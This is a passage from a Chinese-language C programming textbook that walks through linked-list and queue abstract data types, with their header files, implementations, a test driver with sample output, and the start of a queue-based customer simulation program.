List类型的地址作为参数,用户会很 困惑。因此,为了减轻用户的负担,所有的函数均使用指针参数。 头文件中的一个函数原型比其他原型复杂: /* 操作:   把函数作用于链表中的每一 项               */ /*      plist指向一个已初始化的链 表              */ /*      pfun指向一个函数,该函数接受一个Item类型的参数, 且无返回值 */ /* 后置条件:  pfun指向的函数作用于链表中的每一项一 次          */ void Traverse(const List *plist, void(*pfun)(Item item)); 参数pfun是一个指向函数的指针,它指向的函数接受item值且无返回 值。第14章中介绍过,可以把函数指针作为参数传递给另一个函数,然后该 函数就可以使用这个被指针指向的函数。例如,该例中可以让pfun指向显示 链表项的函数。然后把Traverse()函数把该函数作用于链表中的每一项,显 示链表中的内容。 17.3.3 使用接口 我们的目标是,使用这个接口编写程序,但是不必知道具体的实现细节 (如,不知道函数的实现细节)。在编写具体函数之前,我们先编写电影程 序的一个新版本。由于接口要使用List和Item类型,所以该程序也应使用这 些类型。下面是编写该程序的一个伪代码方案。 1330 创建一个List类型的变量。 创建一个Item类型的变量。 初始化链表为空。 当链表未满且有输入时: 把输入读取到Item类型的变量中。 在链表末尾添加项。 
访问链表中的每个项并显示它们。 程序清单 17.4 中的程序按照以上伪代码来编写,其中还加入了一些错 误检查。注意该程序利用了list.h(程序清单 17.3)中描述的接口。另外,还 需注意,链表中含有 showmovies()函数的代码,它与Traverse()的原型一 致。因此,程序可以把指针showmovies传递给Traverse(),这样Traverse()可 以把showmovies()函数应用于链表中的每一项(回忆一下,函数名是指向该 函数的指针)。 程序清单17.4 films3.c程序 /* films3.c -- 使用抽象数据类型(ADT)风格的链表 */ /* 与list.c一起编译           */ #include <stdio.h> #include <stdlib.h>  /* 提供exit()的原型 */ #include "list.h"   /* 定义List、Item */ void showmovies(Item item); char * s_gets(char * st, int n); 1331 int main(void) { List movies; Item temp; /* 初始化   */ InitializeList(&movies); if (ListIsFull(&movies)) { fprintf(stderr, "No memory available! Bye!\n"); exit(1); } /* 获取用户输入并储存 */ puts("Enter first movie title:"); while (s_gets(temp.title, TSIZE) != NULL &&  temp.title[0] != '\0') { puts("Enter your rating <0-10>:"); scanf("%d", &temp.rating); while (getchar() != '\n') 1332 continue; if (AddItem(temp, &movies) == false) { fprintf(stderr, "Problem allocating memory\n"); break; } if (ListIsFull(&movies)) { puts("The list is now full."); break; } puts("Enter next movie title (empty line to stop):"); } /* 显示    */ if (ListIsEmpty(&movies)) printf("No data entered. "); else { printf("Here is the movie list:\n"); 1333 Traverse(&movies, showmovies); } printf("You entered %d movies.\n", ListItemCount(&movies)); /* 清理    */ EmptyTheList(&movies); printf("Bye!\n"); return 0; } void showmovies(Item item) { printf("Movie: %s  Rating: %d\n", item.title, item.rating); } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) 1334 { find = strchr(st, '\n');  // 查找换行符 if (find)           // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;      // 处理输入行的剩余内容 } return ret_val; } 17.3.4 实现接口 当然,我们还是必须实现List接口。C方法是把函数定义统一放在list.c 文件中。然后,整个程序由 list.h(定义数据结构和提供用户接口的原 型)、list.c(提供函数代码实现接口)和 films3.c (把链表接口应用于特定 编程问题的源代码文件)组成。程序清单17.5演示了list.c的一种实现。要运 行该程序,必须把films3.c和list.c一起编译和链接(可以复习一下第9章关于 编译多文件程序的内容)。list.h、list.c和films3.c组成了整个程序(见图 17.5)。 程序清单17.5 list.c实现文件 /* list.c -- 支持链表操作的函数 */ #include <stdio.h> 1335 #include <stdlib.h> #include "list.h" /* 局部函数原型 */ static void CopyToNode(Item item, Node * pnode); /* 接口函数 */ /* 把链表设置为空 */ void InitializeList(List * plist) { *plist = NULL; } /* 如果链表为空,返回true */ bool ListIsEmpty(const List * plist) { if (*plist == NULL) return true; else return false; } /* 如果链表已满,返回true */ 1336 bool ListIsFull(const List * plist) { Node * pt; bool full; pt = (Node *)malloc(sizeof(Node)); if (pt == NULL) full = true; else full = false; free(pt); return full; } /* 返回节点的数量 */ unsigned int ListItemCount(const List * plist) { unsigned int count = 0; Node * pnode = *plist;  /* 设置链表的开始 */ while (pnode != NULL) { 1337 ++count; pnode = pnode->next; /* 设置下一个节点 */ } return count; } /* 创建储存项的节点,并将其添加至由plist指向的链表末尾(较慢的实 现) */ bool AddItem(Item item, List * plist) { Node * pnew; Node * scan = *plist; pnew = (Node *) malloc(sizeof(Node)); if (pnew == NULL) return false;  /* 失败时退出函数 */ CopyToNode(item, pnew); pnew->next = NULL; if (scan == NULL)    /* 空链表,所以把 */ *plist = pnew;    /* pnew放在链表的开头 */ else 1338 { while (scan->next != NULL) scan = scan->next; /* 找到链表的末尾 */ scan->next = pnew;   /* 把pnew添加到链表的末尾 */ } return true; } /* 访问每个节点并执行pfun指向的函数 */ void Traverse(const List * plist, void(*pfun)(Item item)) { Node * pnode = *plist;  /* 设置链表的开始 */ while (pnode != NULL) { (*pfun)(pnode->item); /* 把函数应用于链表中的项 */ pnode = pnode->next; /* 前进到下一项 */ } } /* 释放由malloc()分配的内存 */ /* 设置链表指针为NULL   */ 1339 void EmptyTheList(List * plist) { Node * psave; 
while (*plist != NULL) { psave = (*plist)->next;  /* 保存下一个节点的地址  */ free(*plist);       /* 释放当前节点     */ *plist = psave;      /* 前进至下一个节点   */ } } /* 局部函数定义 */ /* 把一个项拷贝到节点中 */ static void CopyToNode(Item item, Node * pnode) { pnode->item = item; /* 拷贝结构 */ } 1340 图17.5 电影程序的3个部分 1.程序的一些注释 list.c文件有几个需要注意的地方。首先,该文件演示了什么情况下使用 1341 内部链接函数。如第12章所述,具有内部链接的函数只能在其声明所在的文 件夹可见。在实现接口时,有时编写一个辅助函数(不作为正式接口的一部 分)很方便。例如,使用CopyToNode()函数把一个Item类型的值拷贝到Item 类型的变量中。由于该函数是实现的一部分,但不是接口的一部分,所以我 们使用 static 存储类别说明符把它隐藏在list.c文件中。接下来,讨论其他函 数。 InitializeList()函数将链表初始化为空。在我们的实现中,这意味着把 List类型的变量设置为NULL。前面提到过,这要求把指向List类型变量的指 针传递给该函数。 ListIsEmpty()函数很简单,但是它的前提条件是,当链表为空时,链表 变量被设置为NULL。因此,在首次调用 ListIsEmpty()函数之前初始化链表 非常重要。另外,如果要扩展接口添加删除项的功能,那么当最后一个项被 删除时,应该确保该删除函数重置链表为空。对链表而言,链表的大小取决 于可用内存量。ListIsFull()函数尝试为新项分配空间。如果分配失败,说明 链表已满;如果分配成功,则必须释放刚才分配的内存供真正的项所用。 ListItemCount()函数使用常用的链表算法遍历链表,同时统计链表中的 项: unsigned int ListItemCount(const List * plist) { unsigned int count = 0; Node * pnode = *plist;  /* 设置链表的开始 */ while (pnode != NULL) { ++count; 1342 pnode = pnode->next; /* 设置下一个节点 */ } return count; } AddItem()函数是这些函数中最复杂的: bool AddItem(Item item, List * plist) { Node * pnew; Node * scan = *plist; pnew = (Node *) malloc(sizeof(Node)); if (pnew == NULL) return false;       /* 失败时退出函数 */ CopyToNode(item, pnew); pnew->next = NULL; if (scan == NULL)       /* 空链表,所以把 */ *plist = pnew;       /* pnew放在链表的开头 */ else { while (scan->next != NULL) 1343 scan = scan->next; /* 找到链表的末尾 */ scan->next = pnew;   /* 把pnew添加到链表的末尾 */ } return true; } AddItem()函数首先为新节点分配空间。如果分配成功,该函数使用 CopyToNode()把项拷贝到新节点中。然后把该节点的next成员设置为NULL。 这表明该节点是链表中的最后一个节点。最后,完成创建节点并为其成员赋 正确的值之后,该函数把该节点添加到链表的末尾。如果该项是添加到链表 的第 1 个项,需要把头指针设置为指向第1项(记住,头指针的地址是传递 给AddItem()函数的第2个参数,所以*plist就是头指针的值)。否则,代码继 续在链表中前进,直到发现被设置为NULL的next成员。此时,该节点就是 当前的最后一个节点,所以,函数重置它的next成员指向新节点。 要养成良好的编程习惯,给链表添加项之前应调用ListIsFull()函数。但 是,用户可能并未这样做,所以在AddItem()函数内部检查malloc()是否分配 成功。而且,用户还可能在调用ListIsFull()和调用AddItem()函数之间做其他 事情分配了内存,所以最好还是检查malloc()是否分配成功。 Traverse()函数与ListItemCount()函数类似,不过它还把一个指针函数作 用于链表中的每一项。 void Traverse (const List * plist, void (* pfun)(Item item) ) { Node * pnode = *plist; /* 设置链表的开始 */ while (pnode != NULL) 1344 { (*pfun)(pnode->item); /* 把函数应用于该项*/ pnode = pnode->next;  /* 前进至下一个项 */ } } pnode->item代表储存在节点中的数据,pnode->next标识链表中的下一个 节点。如下函数调用: Traverse(movies, showmovies); 把showmovies()函数应用于链表中的每一项。 最后,EmptyTheList()函数释放了之前malloc()分配的内存: void EmptyTheList(List * plist) { Node * psave; while (*plist != NULL) { psave = (*plist)->next;  /* 保存下一个节点的地址  */ free(*plist);       /* 释放当前节点     */ *plist = psave;      /* 前进至下一个节点   */ } 1345 } 该函数的实现通过把List类型的变量设置为NULL来表明一个空链表。因 此,要把List类型变量的地址传递给该函数,以便函数重置。由于List已经是 一个指针,所以plist是一个指向指针的指针。因此,在上面的代码中,*plist 是指向Node的指针。当到达链表末尾时,*plist为NULL,表明原始的实际参 数现在被设置为NULL。 代码中要保存下一节点的地址,因为原则上调用了free()会使当前节点 (即*plist指向的节点)的内容不可用。 提示 const的限制 多个处理链表的函数都把const List * plist作为形参,表明这些函数不会 更改链表。这里, const确实提供了一些保护。它防止了*plist(即plist所指 向的量)被修改。在该程序中,plist指向movies,所以const防止了这些函数 修改movies。因此,在ListItemCount()中,不允许有类似下面的代码: *plist = (*plist)->next; // 如果*plist是const,不允许这样做 因为改变*plist就改变了movies,将导致程序无法跟踪数据。然而, *plist和movies都被看作是const并不意味着*plist或movies指向的数据是 const。例如,可以编写下面的代码: (*plist)->item.rating = 3; // 即使*plist是const,也可以这样做 因为上面的代码并未改变*plist,它改变的是*plist指向的数据。由此可 见,不要指望const能捕获到意外修改数据的程序错误。 2.考虑你要做的 现在花点时间来评估ADT方法做了什么。首先,比较程序清单17.2和程 序清单17.4。这两个程序都使用相同的内存分配方法(动态分配链接的结 构)解决电影链表的问题,但是程序清单17.2暴露了所有的编程细节,把 1346 malloc()和prev->next这样的代码都公之于众。而程序清单17.4隐藏了这些细 节,并用与任务直接相关的方式表达程序。也就是说,该程序讨论的是创建 链表和向链表中添加项,而不是调用内存函数或重置指针。简而言之,程序 清单17.4是根据待解决的问题来表达程序,而不是根据解决问题所需的具体 
工具来表达程序。ADT版本可读性更高,而且针对的是最终的用户所关心的 问题。 其次,list.h 和 list.c 文件一起组成了可复用的资源。如果需要另一个简 单的链表,也可以使用这些文件。假设你需要储存亲戚的一些信息:姓名、 关系、地址和电话号码,那么先要在 list.h 文件中重新定义Item类型: typedef struct itemtag { char fname[14]; char lname [24]; char relationship[36]; char address [60]; char phonenum[20]; } Item; 然后„„只需要做这些就行了。因为所有处理简单链表的函数都与Item类 型有关。根据不同的情况,有时还要重新定义CopyToNode()函数。例如,当 项是一个数组时,就不能通过赋值来拷贝。 另一个要点是,用户接口是根据抽象链表操作定义的,不是根据某些特 定的数据表示和算法来定义。这样,不用重写最后的程序就能随意修改实 现。例如,当前使用的AddItem()函数效率不高,因为它总是从链表第 1 个 项开始,然后搜索至链表末尾。可以通过保存链表结尾处的地址来解决这个 1347 问题。例如,可以这样重新定义List类型: typedef struct list { Node * head; /* 指向链表的开头 */ Node * end;  /* 指向链表的末尾 */ } List; 当然,还要根据新的定义重写处理链表的函数,但是不用修改程序清单 17.4中的内容。对大型编程项目而言,这种把实现和最终接口隔离的做法相 当有用。这称为数据隐藏,因为对终端用户隐藏了数据表示的细节。 注意,这种特殊的ADT甚至不要求以链表的方式实现简单链表。下面是 另一种方法: #define MAXSIZE 100 typedef struct list { Item entries[MAXSIZE]; /* 项数组 */ int items;         /* 其中的项数 */ } List; 这样做也需要重写list.c文件,但是使用list的程序不用修改。 最后,考虑这种方法给程序开发过程带来了哪些好处。如果程序运行出 现问题,可以把问题定位到具体的函数上。如果想用更好的方法来完成某个 任务(如,添加项),只需重写相应的函数即可。如果需要新功能,可以添 1348 加一个新的函数。如果觉得数组或双向链表更好,可以重写实现的代码,不 用修改使用实现的程序。 1349 17.4 队列ADT 在C语言中使用抽象数据类型方法编程包含以下3个步骤。 1.以抽象、通用的方式描述一个类型,包括该类型的操作。 2.设计一个函数接口表示这个新类型。 3.编写具体代码实现这个接口。 前面已经把这种方法应用到简单链表中。现在,把这种方法应用于更复 杂的数据类型:队列。 17.4.1 定义队列抽象数据类型 队列(queue)是具有两个特殊属性的链表。第一,新项只能添加到链 表的末尾。从这方面看,队列与简单链表类似。第二,只能从链表的开头移 除项。可以把队列想象成排队买票的人。你从队尾加入队列,买完票后从队 首离开。队列是一种“先进先出”(first in,first out,缩写为FIFO)的数据形 式,就像排队买票的队伍一样(前提是没有人插队)。接下来,我们建立一 个非正式的抽象定义: 类型名:    队列 类型属性:    可以储存一系列项 类型操作:    初始化队列为空 确定队列为空 确定队列已满 确定队列中的项数 在队列末尾添加项 1350 在队列开头删除或恢复项 清空队列 17.4.2 定义一个接口 接口定义放在queue.h文件中。我们使用C的typedef工具创建两个类型 名:Item和Queue。相应结构的具体实现应该是queue.h文件的一部分,但是 从概念上来看,应该在实现阶段才设计结构。现在,只是假定已经定义了这 些类型,着重考虑函数的原型。 首先,考虑初始化。这涉及改变Queue类型,所以该函数应该以Queue的 地址作为参数: void InitializeQueue (Queue * pq); 接下来,确定队列是否为空或已满的函数应返回真或假值。这里,假设 C99的stdbool.h头文件可用。如果该文件不可用,可以使用int类型或自己定 义bool类型。由于该函数不更改队列,所以接受Queue类型的参数。但是, 传递Queue的地址更快,更节省内存,这取决于Queue类型的对象大小。这次 我们尝试这种方法。这样做的好处是,所有的函数都以地址作为参数,而不 像 List 示例那样。为了表明这些函数不更改队列,可以且应该使用const限 定符: bool QueueIsFull(const Queue * pq); bool QueueIsEmpty (const Queue * pq); 指针pq指向Queue数据对象,不能通过pq这个代理更改数据。可以定义 一个类似该函数的原型,返回队列的项数: int QueueItemCount(const Queue * pq); 在队列末尾添加项涉及标识项和队列。这次要更改队列,所以有必要 1351 (而不是可选)使用指针。该函数的返回类型可以是void,或者通过返回值 来表示是否成功添加项。我们采用后者: bool EnQueue(Item item, Queue * pq); 最后,删除项有多种方法。如果把项定义为结构或一种基本类型,可以 通过函数返回待删除的项。函数的参数可以是Queue类型或指向Queue的指 针。因此,可能是下面这样的原型: Item DeQueue(Queue q); 然而,下面的原型会更合适一些: bool DeQueue(Item * pitem, Queue * pq); 从队列中待删除的项储存在pitem指针指向的位置,函数的返回值表明 是否删除成功。 清空队列的函数所需的唯一参数是队列的地址,可以使用下面的函数原 型: void EmptyTheQueue(Queue * pq); 17.4.3 实现接口数据表示 第一步是确定在队列中使用何种C数据形式。有可能是数组。数组的优 点是方便使用,而且向数组的末尾添加项很简单。问题是如何从队列的开头 删除项。类比于排队买票的队列,从队列的开头删除一个项包括拷贝数组首 元素的值和把数组剩余各项依次向前移动一个位置。编程实现这个过程很简 单,但是会浪费大量的计算机时间(见图17.6)。 1352 图17.6 用数组实现队列 第二种解决数组队列删除问题的方法是改变队列首端的位置,其余元素 不动(见图17.7)。 1353 图17.7 重新定义首元素 解决这种问题的一个好方法是,使队列成为环形。这意味着把数组的首 尾相连,即数组的首元素紧跟在最后一个元素后面。这样,当到达数组末尾 时,如果首元素空出,就可以把新添加的项储存到这些空出的元素中(见图 17.8)。可以想象在一张条形的纸上画出数组,然后把数组的首尾粘起来形 成一个环。当然,要做一些标记,以免尾端超过首端。 1354 图17.8 环形队列 1355 另一种方法是使用链表。使用链表的好处是删除首项时不必移动其余元 素,只需重置头指针指向新的首元素即可。由于我们已经讨论过链表,所以 采用这个方案。我们用一个整数队列开始测试: typedef int Item; 链表由节点组成,所以,下一步是定义节点: typedef struct node { Item item; struct node * next; } Node; 对队列而言,要保存首尾项,这可以使用指针来完成。另外,可以用一 个计数器来记录队列中的项数。因此,该结构应由两个指针成员和一个int类 型的成员构成: typedef struct queue { Node * front; /* 指向队列首项的指针 */ Node * rear; /*指向队列尾项的指针*/ int items;    /* 队列中的项数*/ } Queue; 注意,Queue是一个内含3个成员的结构,所以用指向队列的指针作为参 数比直接用队列作为参数节约了时间和空间。 1356 接下来,考虑队列的大小。对链表而言,其大小受限于可用的内存量, 因此链表不要太大。例如,可能使用一个队列模拟飞机等待在机场着陆。如 果等待的飞机数量太多,新到的飞机就应该改到其他机场降落。我们把队列 
的最大长度设置为10。程序清单17.6包含了队列接口的原型和定义。Item类 型留给用户定义。使用该接口时,可以根据特定的程序插入合适的定义。 程序清单17.6 queue.h接口头文件 /* queue.h -- Queue的接口 */ #ifndef _QUEUE_H_ #define _QUEUE_H_ #include <stdbool.h> // 在这里插入Item类型的定义,例如 typedef int Item;   // 用于use_q.c // 或者 typedef struct item {int gumption; int charisma;} Item; #define MAXQUEUE 10 typedef struct node { Item item; struct node * next; } Node; typedef struct queue 1357 { Node * front; /* 指向队列首项的指针  */ Node * rear; /* 指向队列尾项的指针  */ int items;  /* 队列中的项数     */ } Queue; /* 操作:   初始化队列                  */ /* 前提条件:  pq 指向一个队列                */ /* 后置条件:  队列被初始化为空               */ void InitializeQueue(Queue * pq); /* 操作:   检查队列是否已满               */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  如果队列已满则返回true,否则返回false     */ bool QueueIsFull(const Queue * pq); /* 操作:   检查队列是否为空               */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  如果队列为空则返回true,否则返回false     */ bool QueueIsEmpty(const Queue *pq); /* 操作:   确定队列中的项数               */ 1358 /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  返回队列中的项数               */ int QueueItemCount(const Queue * pq); /* 操作:   在队列末尾添加项               */ /* 前提条件:  pq 指向之前被初始化的队列            */ /*      item是要被添加在队列末尾的项          */ /* 后置条件:  如果队列不为空,item将被添加在队列的末 尾,    */ /*      该函数返回true;否则,队列不改变,该函数返回false*/ bool EnQueue(Item item, Queue * pq); /* 操作:   从队列的开头删除项              */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  如果队列不为空,队列首端的item将被拷贝到*pitem中 */ /*      并被删除,且函数返回true;           */ /*      如果该操作使得队列为空,则重置队列为 空      */ /*      如果队列在操作前为空,该函数返回false       */ 1359 bool DeQueue(Item *pitem, Queue * pq); /* 操作:   清空队列                   */ /* 前提条件:  pq 指向之前被初始化的队列            */ /* 后置条件:  队列被清空                  */ void EmptyTheQueue(Queue * pq); #endif 1.实现接口函数 接下来,我们编写接口代码。首先,初始化队列为空,这里“空”的意思 是把指向队列首项和尾项的指针设置为NULL,并把项数(items成员)设置 为0: void InitializeQueue(Queue * pq) { pq->front = pq->rear = NULL; pq->items = 0; } 这样,通过检查items的值可以很方便地了解到队列是否已满、是否为 空和确定队列的项数: bool QueueIsFull(const Queue * pq) { 1360 return pq->items == MAXQUEUE; } bool QueueIsEmpty(const Queue * pq) { return pq->items == 0; } int QueueItemCount(const Queue * pq) { return pq->items; } 把项添加到队列中,包括以下几个步骤: (1)创建一个新节点; (2)把项拷贝到节点中; (3)设置节点的next指针为NULL,表明该节点是最后一个节点; (4)设置当前尾节点的next指针指向新节点,把新节点链接到队列 中; (5)把rear指针指向新节点,以便找到最后的节点; (6)项数加1。 函数还要处理两种特殊情况。第一种情况,如果队列为空,应该把front 指针设置为指向新节点。因为如果队列中只有一个节点,那么这个节点既是 1361 首节点也是尾节点。第二种情况是,如果函数不能为节点分配所需内存,则 必须执行一些动作。因为大多数情况下我们都使用小型队列,这种情况很少 发生,所以,如果程序运行的内存不足,我们只是通过函数终止程序。 EnQueue()的代码如下: bool EnQueue(Item item, Queue * pq) { Node * pnew; if (QueueIsFull(pq)) return false; pnew = (Node *)malloc( sizeof(Node)); if (pnew == NULL) { fprintf(stderr,"Unable to allocate memory!\n"); exit(1); } CopyToNode(item, pnew); pnew->next = NULL; if (QueueIsEmpty(pq)) pq->front = pnew;   /* 项位于队列首端    */ else 1362 pq->rear->next = pnew; /* 链接到队列尾端    */ pq->rear = pnew;      /* 记录队列尾端的位置  */ pq->items++;        /* 队列项数加1     */ return true; } CopyToNode()函数是静态函数,用于把项拷贝到节点中: static void CopyToNode(Item item, Node * pn) { pn->item = item; } 从队列的首端删除项,涉及以下几个步骤: (1)把项拷贝到给定的变量中; (2)释放空出的节点使用的内存空间; (3)重置首指针指向队列中的下一个项; (4)如果删除最后一项,把首指针和尾指针都重置为NULL; (5)项数减1。 下面的代码完成了这些步骤: bool DeQueue(Item * pitem, Queue * pq) { 1363 Node * pt; if (QueueIsEmpty(pq)) return false; CopyToItem(pq->front, pitem); pt = pq->front; pq->front = pq->front->next; free(pt); pq->items--; if (pq->items == 0) pq->rear = NULL; return true; } 关于指针要注意两点。第一,删除最后一项时,代码中并未显式设置 front指针为NULL,因为已经设置front指针指向被删除节点的next指针。如果 该节点不是最后一个节点,那么它的next指针就为NULL。第二,代码使用 
临时指针(pt)储存待删除节点的位置。因为指向首节点的正式指针(pt- >front)被重置为指向下一个节点,所以如果没有临时指针,程序就不知道 该释放哪块内存。 我们使用DeQueue()函数清空队列。循环调用DeQueue()函数直到队列为 空: void EmptyTheQueue(Queue * pq) 1364 { Item dummy; while (!QueueIsEmpty(pq)) DeQueue(&dummy, pq); } 注意 保持纯正的ADT 定义ADT接口后,应该只使用接口函数处理数据类型。例如, Dequeue()依赖EnQueue()函数来正确设置指针和把rear节点的next指针设置为 NULL。如果在一个使用ADT的程序中,决定直接操控队列的某些部分,有 可能破坏接口包中函数之间的协作关系。 程序清单17.7演示了该接口中的所有函数,包括EnQueue()函数中用到的 CopyToItem()函数。 程序清单17.7 queue.c实现文件 /* queue.c -- Queue类型的实现 */ #include <stdio.h> #include <stdlib.h> #include "queue.h" /* 局部函数 */ static void CopyToNode(Item item, Node * pn); static void CopyToItem(Node * pn, Item * pi); 1365 void InitializeQueue(Queue * pq) { pq->front = pq->rear = NULL; pq->items = 0; } bool QueueIsFull(const Queue * pq) { return pq->items == MAXQUEUE; } bool QueueIsEmpty(const Queue * pq) { return pq->items == 0; } int QueueItemCount(const Queue * pq) { return pq->items; } bool EnQueue(Item item, Queue * pq) { 1366 Node * pnew; if (QueueIsFull(pq)) return false; pnew = (Node *) malloc(sizeof(Node)); if (pnew == NULL) { fprintf(stderr, "Unable to allocate memory!\n"); exit(1); } CopyToNode(item, pnew); pnew->next = NULL; if (QueueIsEmpty(pq)) pq->front = pnew;     /* 项位于队列的首端   */ else pq->rear->next = pnew;   /* 链接到队列的尾端   */ pq->rear = pnew;        /* 记录队列尾端的位置  */ pq->items++;          /* 队列项数加1     */ return true; } 1367 bool DeQueue(Item * pitem, Queue * pq) { Node * pt; if (QueueIsEmpty(pq)) return false; CopyToItem(pq->front, pitem); pt = pq->front; pq->front = pq->front->next; free(pt); pq->items--; if (pq->items == 0) pq->rear = NULL; return true; } /* 清空队列 */ void EmptyTheQueue(Queue * pq) { Item dummy; while (!QueueIsEmpty(pq)) 1368 DeQueue(&dummy, pq); } /* 局部函数 */ static void CopyToNode(Item item, Node * pn) { pn->item = item; } static void CopyToItem(Node * pn, Item * pi) { *pi = pn->item; } 17.4.4 测试队列 在重要程序中使用一个新的设计(如,队列包)之前,应该先测试该设 计。测试的一种方法是,编写一个小程序。这样的程序称为驱动程序 (driver),其唯一的用途是进行测试。例如,程序清单17.8使用一个添加 和删除整数的队列。在运行该程序之前,要确保queue.h中包含下面这行代 码: typedef int item; 记住,还必须链接queue.c和use_q.c。 程序清单17.8 use_q.c程序 1369 /* use_q.c -- 驱动程序测试 Queue 接口 */ /* 与 queue.c 一起编译          */ #include <stdio.h> #include "queue.h" /* 定义Queue、Item  */ int main(void) { Queue line; Item temp; char ch; InitializeQueue(&line); puts("Testing the Queue interface. Type a to add a value,"); puts("type d to delete a value, and type q to quit."); while ((ch = getchar()) != 'q') { if (ch != 'a' && ch != 'd') /* 忽略其他输出 */ continue; if (ch == 'a') { printf("Integer to add: "); 1370 scanf("%d", &temp); if (!QueueIsFull(&line)) { printf("Putting %d into queue\n", temp); EnQueue(temp, &line); } else puts("Queue is full!"); } else { if (QueueIsEmpty(&line)) puts("Nothing to delete!"); else { DeQueue(&temp, &line); printf("Removing %d from queue\n", temp); } } 1371 printf("%d items in queue\n", QueueItemCount(&line)); puts("Type a to add, d to delete, q to quit:"); } EmptyTheQueue(&line); puts("Bye!"); return 0; } 下面是一个运行示例。除了这样测试,还应该测试当队列已满后,实现 是否能正常运行。 Testing the Queue interface. Type a to add a value, type d to delete a value, and type q to quit. 
a Integer to add: 40 Putting 40 into queue 1 items in queue Type a to add, d to delete, q to quit: a Integer to add: 20 Putting 20 into queue 1372 2 items in queue Type a to add, d to delete, q to quit: a Integer to add: 55 Putting 55 into queue 3 items in queue Type a to add, d to delete, q to quit: d Removing 40 from queue 2 items in queue Type a to add, d to delete, q to quit: d Removing 20 from queue 1 items in queue Type a to add, d to delete, q to quit: d Removing 55 from queue 0 items in queue Type a to add, d to delete, q to quit: 1373 d Nothing to delete! 0 items in queue Type a to add, d to delete, q to quit: q Bye! 1374 17.5 用队列进行模拟 经过测试,队列没问题。现在,我们用它来做一些有趣的事情。许多现 实生活的情形都涉及队列。例如,在银行或超市的顾客队列、机场的飞机队 列、多任务计算机系统中的任务队列等。我们可以用队列包来模拟这些情 形。 假设Sigmund Landers在商业街设置了一个提供建议的摊位。顾客可以购 买1分钟、2分钟或3分钟的建议。为确保交通畅通,商业街规定每个摊位前 排队等待的顾客最多为10人(相当于程序中的最大队列长度)。假设顾客都 是随机出现的,并且他们花在咨询上的时间也是随机选择的(1分钟、2分 钟、3分钟)。那么 Sigmund 平均每小时要接待多少名顾客?每位顾客平均 要花多长时间?排队等待的顾客平均有多少人?队列模拟能回答类似的问 题。 首先,要确定在队列中放什么。可以根据顾客加入队列的时间和顾客咨 询时花费的时间来描述每一位顾客。因此,可以这样定义Item类型。 typedef struct item { long arrive;   /* 一位顾客加入队列的时间 */ int processtime; /* 该顾客咨询时花费的时间 */ } Item; 要用队列包来处理这个结构,必须用typedef定义的Item替换上一个示例 的int类型。这样做就不用担心队列的具体工作机制,可以集中精力分析实际 问题,即模拟咨询Sigmund的顾客队列。 这里有一种方法,让时间以1分钟为单位递增。每递增1分钟,就检查是 否有新顾客到来。如果有一位顾客且队列未满,将该顾客添加到队列中。这 1375 涉及把顾客到来的时间和顾客所需的咨询时间记录在Item类型的结构中,然 后在队列中添加该项。然而,如果队列已满,就让这位顾客离开。为了做统 计,要记录顾客的总数和被拒顾客(队列已满不能加入队列的人)的总数。 接下来,处理队列的首端。也就是说,如果队列不为空且前面的顾客没 有在咨询 Sigmund,则删除队列首端的项。记住,该项中储存着这位顾客加 入队列的时间,把该时间与当前时间作比较,就可得出该顾客在队列中等待 的时间。该项还储存着这位顾客需要咨询的分钟数,即还要咨询 Sigmund多 长时间。因此还要用一个变量储存这个时长。如果Sigmund 正忙,则不用让 任何人离开队列。尽管如此,记录等待时间的变量应该递减1。 核心代码类似下面这样,每一轮迭代对应1分钟的行为: for (cycle = 0; cycle < cyclelimit; cycle++) { if (newcustomer(min_per_cust)) { if (QueueIsFull(&line)) turnaways++; else { customers++; temp = customertime(cycle); EnQueue(temp, &line); } 1376 } if (wait_time <= 0 && !QueueIsEmpty(&line)) { DeQueue(&temp, &line); wait_time = temp.processtime; line_wait += cycle - temp.arrive; served++; } if (wait_time > 0) wait_time––; sum_line += QueueItemCount(&line); } 注意,时间的表示比较粗糙(1分钟),所以一小时最多60位顾客。下 面是一些变量和函数的含义。 min_per_cus是顾客到达的平均间隔时间。 newcustomer()使用C的rand()函数确定在特定时间内是否有顾客到来。 turnaways是被拒绝的顾客数量。 customers是加入队列的顾客数量。 temp是表示新顾客的Item类型变量。 1377 customertime()设置temp结构中的arrive和processtime成员。 wait_time是Sigmund完成当前顾客的咨询还需多长时间。 line_wait是到目前为止队列中所有顾客的等待总时间。 served是咨询过Sigmund的顾客数量。 sum_line是到目前为止统计的队列长度。 如果到处都是malloc()、free()和指向节点的指针,整个程序代码会非常 混乱和晦涩。队列包让你把注意力集中在模拟问题上,而不是编程细节上。 程序清单 17.9 演示了模拟商业街咨询摊位队列的完整代码。根据第 12 章介绍的方法,使用标准函数rand()、srand()和 time()来产生随机数。另外要 特别注意,必须用下面的代码更新 queue.h 中的Item,该程序才能正常工 作: typedef struct item { long arrive;    //一位顾客加入队列的时间 int processtime;  //该顾客咨询时花费的时间 } Item; 记住,还要把mall.c和queue.c一起链接。 程序清单17.9 mall.c程序 // mall.c -- 使用 Queue 接口 // 和 queue.c 一起编译 1378 #include <stdio.h> #include <stdlib.h>       // 提供 rand() 和 srand() 的原型 #include <time.h>         // 提供 time() 的原型 #include "queue.h"        // 更改 Item 的 typedef #define MIN_PER_HR 60.0 bool newcustomer(double x);   // 是否有新顾客到来? 
Item customertime(long when);  // 设置顾客参数 int main(void) { Queue line; Item temp;          // 新的顾客数据 int hours;          // 模拟的小时数 int perhour;         // 每小时平均多少位顾客 long cycle, cyclelimit;   // 循环计数器、计数器的上限 long turnaways = 0;     // 因队列已满被拒的顾客数量 long customers = 0;     // 加入队列的顾客数量 long served = 0;       // 在模拟期间咨询过Sigmund的顾客数量 long sum_line = 0;      // 累计的队列总长 int wait_time = 0;      // 从当前到Sigmund空闲所需的时间 1379 double min_per_cust;    // 顾客到来的平均时间 long line_wait = 0;     // 队列累计的等待时间 InitializeQueue(&line); srand((unsigned int) time(0)); // rand() 随机初始化 puts("Case Study: Sigmund Lander's Advice Booth"); puts("Enter the number of simulation hours:"); scanf("%d", &hours); cyclelimit = MIN_PER_HR * hours; puts("Enter the average number of customers per hour:"); scanf("%d", &perhour); min_per_cust 